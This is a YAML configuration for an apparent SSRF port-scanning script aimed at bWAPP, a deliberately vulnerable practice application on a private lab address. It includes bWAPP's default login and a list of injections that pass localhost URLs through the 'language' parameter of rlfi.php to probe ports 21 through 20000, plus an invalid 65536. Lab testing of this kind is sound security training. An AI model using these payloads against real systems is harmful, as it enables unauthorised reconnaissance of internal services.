log_level: 'INFO'

remote_host: '192.168.1.154'
remote_port: '80'

login_endpoint: "/bWAPP/login.php"
post_login_injection_data: 
  login: 'bee'
  password: 'bug' 
  security_level: '0'
  form: 'submit'
  
session_cookie_names: 
  - "PHPSESSID"
  - "security_level"

vuln_webpage: "/bWAPP/rlfi.php"

ssrf_injections: 
  - name: "PORT-21"
    hostname: "127.0.0.1"
    port: "21"
    injection: "language=http://{hostname}:{port}&action=go"
  
  - name: "PORT-22"
    hostname: "127.0.0.1"
    port: "22"
    injection: "language=http://{hostname}:{port}&action=go"
  
  - name: "PORT-23"
    hostname: "127.0.0.1"
    port: "23"
    injection: "language=http://{hostname}:{port}&action=go"
  
  - name: "PORT-25"
    hostname: "127.0.0.1"
    port: "25"
    injection: "language=http://{hostname}:{port}&action=go"
  
  - name: "PORT-80"
    hostname: "127.0.0.1"
    port: "80"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-123"
    hostname: "127.0.0.1"
    port: "123"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-443"
    hostname: "127.0.0.1"
    port: "443"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-8080"
    hostname: "127.0.0.1"
    port: "8080"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-8443"
    hostname: "127.0.0.1"
    port: "8443"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-9443"
    hostname: "127.0.0.1"
    port: "9443"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-9080"
    hostname: "127.0.0.1"
    port: "9080"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-9999"
    hostname: "127.0.0.1"
    port: "9999"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-10000"
    hostname: "127.0.0.1"
    port: "10000"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-14400"
    hostname: "127.0.0.1"
    port: "14400"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-20000"
    hostname: "127.0.0.1"
    port: "20000"
    injection: "language=http://{hostname}:{port}&action=go"

  - name: "PORT-65536"
    hostname: "127.0.0.1"
    port: "65536"
    injection: "language=http://{hostname}:{port}&action=go"
